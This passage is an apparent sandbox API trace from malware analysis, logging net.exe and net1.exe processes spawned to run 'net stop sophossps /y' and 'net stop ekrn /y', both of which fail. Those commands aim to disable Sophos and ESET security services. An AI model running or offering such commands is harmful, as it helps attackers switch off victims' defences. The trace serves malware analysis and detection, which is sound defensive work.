"BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 539 os_tid = 0xb4c Process: id = "365" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x4a9b8000" os_pid = "0xb3c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "364" os_parent_pid = "0xb5c" cmd_line = "C:\\Windows\\system32\\net1 stop sophossps /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 540 os_tid = 0x62c [0217.367] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2afc6c | out: lpSystemTimeAsFileTime=0x2afc6c*(dwLowDateTime=0x4abfe000, dwHighDateTime=0x1d57a87)) [0217.367] GetCurrentProcessId () returned 0xb3c [0217.367] GetCurrentThreadId () returned 0x62c [0217.367] GetTickCount () returned 0x116fe2d [0217.368] QueryPerformanceCounter (in: lpPerformanceCount=0x2afc64 | out: lpPerformanceCount=0x2afc64*=33765220205) returned 1 [0217.368] GetModuleHandleA (lpModuleName=0x0) returned 0x5f0000 [0217.368] __set_app_type (_Type=0x1) [0217.368] __p__fmode () returned 0x74eb31f4 [0217.368] __p__commode () returned 0x74eb31fc [0217.368] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x5fffe6) returned 0x0 [0217.368] __getmainargs (in: _Argc=0x609064, _Argv=0x60906c, _Env=0x609068, _DoWildCard=0, _StartInfo=0x609024 | out: _Argc=0x609064, _Argv=0x60906c, _Env=0x609068) returned 0 [0217.368] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0217.368] GetConsoleOutputCP () returned 0x1b5 [0217.369] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x609080 | out: lpCPInfo=0x609080) returned 1 [0217.369] SetThreadUILanguage (LangId=0x0) returned 0x409 [0217.371] sprintf_s (in: _DstBuf=0x2afc24, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0217.372] setlocale (category=0, locale=".437") returned="English_United States.437" [0217.374] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0217.374] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0217.374] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop sophossps /y" [0217.374] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2af9f0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0217.374] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x66) returned 0x743c00 [0217.374] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0217.374] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2afbf4 | out: Buffer=0x2afbf4*=0x741c60) returned 0x0 [0217.374] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2afbf4 | out: Buffer=0x2afbf4*=0x741c78) returned 0x0 [0217.374] _fileno (_File=0x74eb2900) returned -2 [0217.375] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0217.375] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0217.375] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0217.375] _wcsicmp (_String1="config", _String2="stop") returned -16 [0217.375] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0217.375] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0217.375] _wcsicmp (_String1="file", _String2="stop") returned -13 [0217.375] _wcsicmp (_String1="files", _String2="stop") returned -13 [0217.375] _wcsicmp (_String1="group", _String2="stop") returned -12 [0217.375] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0217.375] _wcsicmp (_String1="help", _String2="stop") returned -11 [0217.375] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0217.375] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0217.375] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0217.375] _wcsicmp (_String1="session", _String2="stop") returned -15 [0217.375] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0217.375] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0217.375] _wcsicmp (_String1="share", _String2="stop") returned -12 [0217.375] _wcsicmp (_String1="start", _String2="stop") returned -14 [0217.375] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0217.375] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0217.375] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0217.375] _wcsicmp (_String1="accounts", _String2="sophossps") returned -18 [0217.375] _wcsicmp (_String1="computer", _String2="sophossps") returned -16 [0217.375] _wcsicmp (_String1="config", _String2="sophossps") returned -16 [0217.375] _wcsicmp (_String1="continue", _String2="sophossps") returned -16 [0217.375] _wcsicmp (_String1="cont", _String2="sophossps") returned -16 [0217.375] _wcsicmp (_String1="file", _String2="sophossps") returned -13 [0217.375] _wcsicmp (_String1="files", _String2="sophossps") returned -13 [0217.375] _wcsicmp (_String1="group", _String2="sophossps") returned -12 [0217.375] _wcsicmp (_String1="groups", _String2="sophossps") returned -12 [0217.375] _wcsicmp (_String1="help", _String2="sophossps") returned -11 [0217.375] _wcsicmp (_String1="helpmsg", _String2="sophossps") returned -11 [0217.375] _wcsicmp (_String1="localgroup", _String2="sophossps") returned -7 [0217.375] _wcsicmp (_String1="pause", _String2="sophossps") returned -3 [0217.375] _wcsicmp (_String1="session", _String2="sophossps") returned -10 [0217.376] _wcsicmp (_String1="sessions", _String2="sophossps") returned -10 [0217.376] _wcsicmp (_String1="sess", _String2="sophossps") returned -10 [0217.376] _wcsicmp (_String1="share", _String2="sophossps") returned -7 [0217.376] _wcsicmp (_String1="start", _String2="sophossps") returned 5 [0217.376] _wcsicmp (_String1="stats", _String2="sophossps") returned 5 [0217.376] _wcsicmp (_String1="statistics", _String2="sophossps") returned 5 [0217.376] _wcsicmp (_String1="stop", _String2="sophossps") returned 5 [0217.376] _wcsicmp (_String1="time", _String2="sophossps") returned 1 [0217.376] _wcsicmp (_String1="user", _String2="sophossps") returned 2 [0217.376] _wcsicmp (_String1="users", _String2="sophossps") returned 2 [0217.376] _wcsicmp (_String1="msg", _String2="sophossps") returned -6 [0217.376] _wcsicmp (_String1="messenger", _String2="sophossps") returned -6 [0217.376] _wcsicmp (_String1="receiver", _String2="sophossps") returned -1 [0217.376] _wcsicmp (_String1="rcv", _String2="sophossps") returned -1 [0217.376] _wcsicmp (_String1="netpopup", _String2="sophossps") returned -5 [0217.376] _wcsicmp (_String1="redirector", _String2="sophossps") returned -1 [0217.376] _wcsicmp (_String1="redir", _String2="sophossps") returned -1 [0217.376] _wcsicmp (_String1="rdr", _String2="sophossps") returned -1 [0217.376] _wcsicmp (_String1="workstation", _String2="sophossps") returned 4 [0217.376] _wcsicmp (_String1="work", _String2="sophossps") returned 4 [0217.376] _wcsicmp (_String1="wksta", _String2="sophossps") returned 4 [0217.376] _wcsicmp (_String1="prdr", _String2="sophossps") returned -3 [0217.376] _wcsicmp (_String1="devrdr", _String2="sophossps") returned -15 [0217.376] _wcsicmp (_String1="lanmanworkstation", _String2="sophossps") returned -7 [0217.376] _wcsicmp (_String1="server", _String2="sophossps") returned -10 [0217.376] _wcsicmp (_String1="svr", _String2="sophossps") returned 7 [0217.376] _wcsicmp (_String1="srv", _String2="sophossps") returned 3 [0217.376] _wcsicmp (_String1="lanmanserver", _String2="sophossps") returned -7 [0217.376] _wcsicmp (_String1="alerter", _String2="sophossps") returned -18 [0217.376] _wcsicmp (_String1="netlogon", _String2="sophossps") returned -5 [0217.376] _wcsupr (in: _String="sophossps" | out: _String="SOPHOSSPS") returned="SOPHOSSPS" [0217.377] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x7454b8 [0217.379] GetServiceKeyNameW (in: hSCManager=0x7454b8, lpDisplayName="SOPHOSSPS", lpServiceName=0x60aaf0, lpcchBuffer=0x2afb90 | out: lpServiceName="", lpcchBuffer=0x2afb90) returned 0 [0217.380] _wcsicmp (_String1="msg", _String2="SOPHOSSPS") returned -6 [0217.380] _wcsicmp (_String1="messenger", _String2="SOPHOSSPS") returned -6 [0217.380] _wcsicmp (_String1="receiver", _String2="SOPHOSSPS") returned -1 [0217.380] _wcsicmp (_String1="rcv", _String2="SOPHOSSPS") returned -1 [0217.380] _wcsicmp (_String1="redirector", _String2="SOPHOSSPS") returned -1 [0217.380] _wcsicmp (_String1="redir", _String2="SOPHOSSPS") returned -1 [0217.380] _wcsicmp (_String1="rdr", _String2="SOPHOSSPS") returned -1 [0217.380] _wcsicmp (_String1="workstation", _String2="SOPHOSSPS") returned 4 [0217.380] _wcsicmp (_String1="work", _String2="SOPHOSSPS") returned 4 [0217.380] _wcsicmp (_String1="wksta", _String2="SOPHOSSPS") returned 4 [0217.380] _wcsicmp (_String1="prdr", _String2="SOPHOSSPS") returned -3 [0217.380] _wcsicmp (_String1="devrdr", _String2="SOPHOSSPS") returned -15 [0217.380] _wcsicmp (_String1="lanmanworkstation", _String2="SOPHOSSPS") returned -7 [0217.380] _wcsicmp (_String1="server", _String2="SOPHOSSPS") returned -10 [0217.380] _wcsicmp (_String1="svr", _String2="SOPHOSSPS") returned 7 [0217.380] _wcsicmp (_String1="srv", _String2="SOPHOSSPS") returned 3 [0217.380] _wcsicmp (_String1="lanmanserver", _String2="SOPHOSSPS") returned -7 [0217.380] _wcsicmp (_String1="alerter", _String2="SOPHOSSPS") returned -18 [0217.380] _wcsicmp (_String1="netlogon", _String2="SOPHOSSPS") returned -5 [0217.380] NetServiceControl (in: servername=0x0, service="SOPHOSSPS", opcode=0x0, arg=0x0, bufptr=0x2afb8c | out: bufptr=0x2afb8c) returned 0x889 [0217.381] wcscpy_s (in: _Destination=0x60a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0217.381] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a80000 [0217.382] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a80000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x60b338, nSize=0x800, Arguments=0x609dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0217.383] GetFileType (hFile=0x26c) returned 0x3 [0217.383] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x743fe8 [0217.383] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x743fe8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0217.383] WriteFile (in: hFile=0x26c, lpBuffer=0x743fe8, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x2afacc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2afacc, lpOverlapped=0x0) returned 0 [0217.383] LocalFree (hMem=0x743fe8) returned 0x0 [0217.383] GetFileType (hFile=0x26c) returned 0x3 [0217.383] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x746290 [0217.383] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x746290, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nt", lpUsedDefaultChar=0x0) returned 2 [0217.383] WriteFile (in: hFile=0x26c, lpBuffer=0x746290, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2afacc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2afacc, lpOverlapped=0x0) returned 0 [0217.383] LocalFree (hMem=0x746290) returned 0x0 [0217.383] _ultow (in: _Dest=0x889, _Radix=2816764 | out: _Dest=0x889) returned="2185" [0217.383] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a80000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x60b338, nSize=0x800, Arguments=0x609dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0217.383] GetFileType (hFile=0x26c) returned 0x3 [0217.383] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x746290 [0217.383] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x746290, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0217.384] WriteFile (in: hFile=0x26c, lpBuffer=0x746290, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x2afad8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2afad8, lpOverlapped=0x0) returned 0 [0217.384] LocalFree (hMem=0x746290) returned 0x0 [0217.384] GetFileType (hFile=0x26c) returned 0x3 [0217.384] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x746290 [0217.384] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x746290, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nt", lpUsedDefaultChar=0x0) returned 2 [0217.384] WriteFile (in: hFile=0x26c, lpBuffer=0x746290, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2afad8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2afad8, lpOverlapped=0x0) returned 0 [0217.384] LocalFree (hMem=0x746290) returned 0x0 [0217.384] NetApiBufferFree (Buffer=0x741c60) returned 0x0 [0217.384] NetApiBufferFree (Buffer=0x741c78) returned 0x0 [0217.384] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop sophossps /y" [0217.384] exit (_Code=2) Process: id = "366" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x64957000" os_pid = "0xb9c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop ekrn /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 541 os_tid = 0xb8c Process: id = "367" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x53c6c000" os_pid = "0xb7c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "366" os_parent_pid = "0xb9c" cmd_line = "C:\\Windows\\system32\\net1 stop ekrn /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 542 os_tid = 0xb6c [0217.518] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20f904 | out: lpSystemTimeAsFileTime=0x20f904*(dwLowDateTime=0x4ad7adc0, dwHighDateTime=0x1d57a87)) [0217.518] GetCurrentProcessId () returned 0xb7c [0217.518] GetCurrentThreadId () returned 0xb6c [0217.518] GetTickCount () returned 0x116fec9 [0217.518] QueryPerformanceCounter (in: lpPerformanceCount=0x20f8fc | out: lpPerformanceCount=0x20f8fc*=33780280459) returned 1 [0217.518] GetModuleHandleA (lpModuleName=0x0) returned 0x660000 [0217.518] __set_app_type (_Type=0x1) [0217.518] __p__fmode () returned 0x74eb31f4 [0217.519] __p__commode () returned 0x74eb31fc [0217.519] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x66ffe6) returned 0x0 [0217.519] __getmainargs (in: _Argc=0x679064, _Argv=0x67906c, _Env=0x679068, _DoWildCard=0, _StartInfo=0x679024 | out: _Argc=0x679064, _Argv=0x67906c, _Env=0x679068) returned 0 [0217.519] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0217.519] GetConsoleOutputCP () returned 0x1b5 [0217.519] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x679080 | out: lpCPInfo=0x679080) returned 1 [0217.519] SetThreadUILanguage (LangId=0x0) returned 0x409 [0217.522] sprintf_s (in: _DstBuf=0x20f8bc, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0217.523] setlocale (category=0, locale=".437") returned="English_United States.437" [0217.525] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0217.525] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0217.525] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ekrn /y" [0217.525] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x20f688, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0217.525] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x5c) returned 0x403bf0 [0217.525] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0217.526] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x20f88c | out: Buffer=0x20f88c*=0x401c50) returned 0x0 [0217.526] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x20f88c | out: Buffer=0x20f88c*=0x401c68) returned 0x0 [0217.526] _fileno (_File=0x74eb2900) returned -2 [0217.526] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0217.526] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0217.526] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0217.526] _wcsicmp (_String1="config", _String2="stop") returned -16 [0217.526] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0217.526] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0217.526] _wcsicmp (_String1="file", _String2="stop") returned -13 [0217.526] _wcsicmp (_String1="files", _String2="stop") returned -13 [0217.526] _wcsicmp (_String1="group", _String2="stop") returned -12 [0217.526] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0217.526] _wcsicmp (_String1="help", _String2="stop") returned -11 [0217.526] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0217.526] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0217.526] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0217.526] _wcsicmp (_String1="session", _String2="stop") returned -15 [0217.526] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0217.526] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0217.526] _wcsicmp (_String1="share", _String2="stop") returned -12 [0217.526] _wcsicmp (_String1="start", _String2="stop") returned -14 [0217.526] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0217.526] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0217.526] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0217.526] _wcsicmp (_String1="accounts", _String2="ekrn") returned -4 [0217.526] _wcsicmp (_String1="computer", _String2="ekrn") returned -2 [0217.526] _wcsicmp (_String1="config", _String2="ekrn") returned -2 [0217.526] _wcsicmp (_String1="continue", _String2="ekrn") returned -2 [0217.526] _wcsicmp (_String1="cont", _String2="ekrn") returned -2 [0217.527] _wcsicmp (_String1="file", _String2="ekrn") returned 1 [0217.527] _wcsicmp (_String1="files", _String2="ekrn") returned 1 [0217.527] _wcsicmp (_String1="group", _String2="ekrn") returned 2 [0217.527] _wcsicmp (_String1="groups", _String2="ekrn") returned 2 [0217.527] _wcsicmp (_String1="help", _String2="ekrn") returned 3 [0217.527] _wcsicmp (_String1="helpmsg", _String2="ekrn") returned 3 [0217.527] _wcsicmp (_String1="localgroup", _String2="ekrn") returned 7 [0217.527] _wcsicmp (_String1="pause", _String2="ekrn") returned 11 [0217.527] _wcsicmp (_String1="session", _String2="ekrn") returned 14 [0217.527] _wcsicmp (_String1="sessions", _String2="ekrn") returned 14 [0217.527] _wcsicmp (_String1="sess", _String2="ekrn") returned 14 [0217.527] _wcsicmp (_String1="share", _String2="ekrn") returned 14 [0217.527] _wcsicmp (_String1="start", _String2="ekrn") returned 14 [0217.527] _wcsicmp (_String1="stats", _String2="ekrn") returned 14 [0217.527] _wcsicmp (_String1="statistics", _String2="ekrn") returned 14 [0217.527] _wcsicmp (_String1="stop", _String2="ekrn") returned 14 [0217.527] _wcsicmp (_String1="time", _String2="ekrn") returned 15 [0217.527] _wcsicmp (_String1="user", _String2="ekrn") returned 16 [0217.527] _wcsicmp (_String1="users", _String2="ekrn") returned 16 [0217.527] _wcsicmp (_String1="msg", _String2="ekrn") returned 8 [0217.527] _wcsicmp (_String1="messenger", _String2="ekrn") returned 8 [0217.527] _wcsicmp (_String1="receiver", _String2="ekrn") returned 13 [0217.527] _wcsicmp (_String1="rcv", _String2="ekrn") returned 13 [0217.527] _wcsicmp (_String1="netpopup", _String2="ekrn") returned 9 [0217.527] _wcsicmp (_String1="redirector", _String2="ekrn") returned 13 [0217.527] _wcsicmp (_String1="redir", _String2="ekrn") returned 13 [0217.527] _wcsicmp (_String1="rdr", _String2="ekrn") returned 13 [0217.527] _wcsicmp (_String1="workstation", _String2="ekrn") returned 18 [0217.527] _wcsicmp (_String1="work", _String2="ekrn") returned 18 [0217.527] _wcsicmp (_String1="wksta", _String2="ekrn") returned 18 [0217.527] _wcsicmp (_String1="prdr", _String2="ekrn") returned 11 [0217.527] _wcsicmp (_String1="devrdr", _String2="ekrn") returned -1 [0217.527] _wcsicmp (_String1="lanmanworkstation", _String2="ekrn") returned 7 [0217.527] _wcsicmp (_String1="server", _String2="ekrn") returned 14 [0217.527] _wcsicmp (_String1="svr", _String2="ekrn") returned 14 [0217.527] _wcsicmp (_String1="srv", _String2="ekrn") returned 14 [0217.527] _wcsicmp (_String1="lanmanserver", _String2="ekrn") returned 7 [0217.527] _wcsicmp (_String1="alerter", _String2="ekrn") returned -4 [0217.528] _wcsicmp (_String1="netlogon", _String2="ekrn") returned 9 [0217.528] _wcsupr (in: _String="ekrn" | out: _String="EKRN") returned="EKRN" [0217.528] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x4054a0 [0217.532] GetServiceKeyNameW (in: hSCManager=0x4054a0, lpDisplayName="EKRN", lpServiceName=0x67aaf0, lpcchBuffer=0x20f828 | out: lpServiceName="", lpcchBuffer=0x20f828) returned 0 [0217.532] _wcsicmp (_String1="msg", _String2="EKRN") returned 8 [0217.532] _wcsicmp (_String1="messenger", _String2="EKRN") returned 8 [0217.532] _wcsicmp (_String1="receiver", _String2="EKRN") returned 13 [0217.532] _wcsicmp (_String1="rcv", _String2="EKRN") returned 13 [0217.532] _wcsicmp (_String1="redirector", _String2="EKRN") returned 13 [0217.532] _wcsicmp (_String1="redir", _String2="EKRN") returned 13 [0217.532] _wcsicmp (_String1="rdr", _String2="EKRN") returned 13 [0217.532] _wcsicmp (_String1="workstation", _String2="EKRN") returned 18 [0217.532] _wcsicmp (_String1="work", _String2="EKRN") returned 18 [0217.532] _wcsicmp (_String1="wksta", _String2="EKRN") returned 18 [0217.532] _wcsicmp (_String1="prdr", _String2="EKRN") returned 11 [0217.532] _wcsicmp (_String1="devrdr", _String2="EKRN") returned -1 [0217.532] _wcsicmp (_String1="lanmanworkstation", _String2="EKRN") returned 7 [0217.532] _wcsicmp (_String1="server", _String2="EKRN") returned 14 [0217.532] _wcsicmp (_String1="svr", _String2="EKRN") returned 14 [0217.532] _wcsicmp (_String1="srv", _String2="EKRN") returned 14 [0217.532] _wcsicmp (_String1="lanmanserver", _String2="EKRN") returned 7 [0217.533] _wcsicmp (_String1="alerter", _String2="EKRN") returned -4 [0217.533] _wcsicmp (_String1="netlogon", _String2="EKRN") returned 9 [0217.533] NetServiceControl (in: servername=0x0, service="EKRN", opcode=0x0, arg=0x0, bufptr=0x20f824 | out: bufptr=0x20f824) returned 0x889 [0217.533] wcscpy_s (in: _Destination=0x67a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0217.534] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a10000 [0217.534] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a10000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x67b338, nSize=0x800, Arguments=0x679dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0217.535] GetFileType (hFile=0x26c) returned 0x3 [0217.535] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x403fd0 [0217.535] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x403fd0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0217.535] WriteFile (in: hFile=0x26c, lpBuffer=0x403fd0, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x20f764, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x20f764, lpOverlapped=0x0) returned 0 [0217.535] LocalFree (hMem=0x403fd0) returned 0x0 [0217.535] GetFileType (hFile=0x26c) returned 0x3 [0217.535] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x406278 [0217.535] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x406278, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n@", lpUsedDefaultChar=0x0) returned 2 [0217.535] WriteFile (in: hFile=0x26c, lpBuffer=0x406278, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x20f764, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x20f764, lpOverlapped=0x0) returned 0 [0217.536] LocalFree (hMem=0x406278) returned 0x0 [0217.536] _ultow (in: _Dest=0x889, _Radix=2160532 | out: _Dest=0x889) returned="2185" [0217.536] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a10000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x67b338, nSize=0x800, Arguments=0x679dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0217.536] GetFileType (hFile=0x26c) returned 0x3 [0217.536] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x406278 [0217.536] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x406278, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0217.536] WriteFile (in: hFile=0x26c, lpBuffer=0x406278, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x20f770, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x20f770, lpOverlapped=0x0) returned 0 [0217.536] LocalFree (hMem=0x406278) returned 0x0 [0217.536] GetFileType (hFile=0x26c) returned 0x3 [0217.536] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x406278 [0217.536] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x406278, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n@", lpUsedDefaultChar=0x0) returned 2 [0217.536] WriteFile (in: hFile=0x26c, lpBuffer=0x406278, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x20f770, lpOverlapped=0x0 | out: 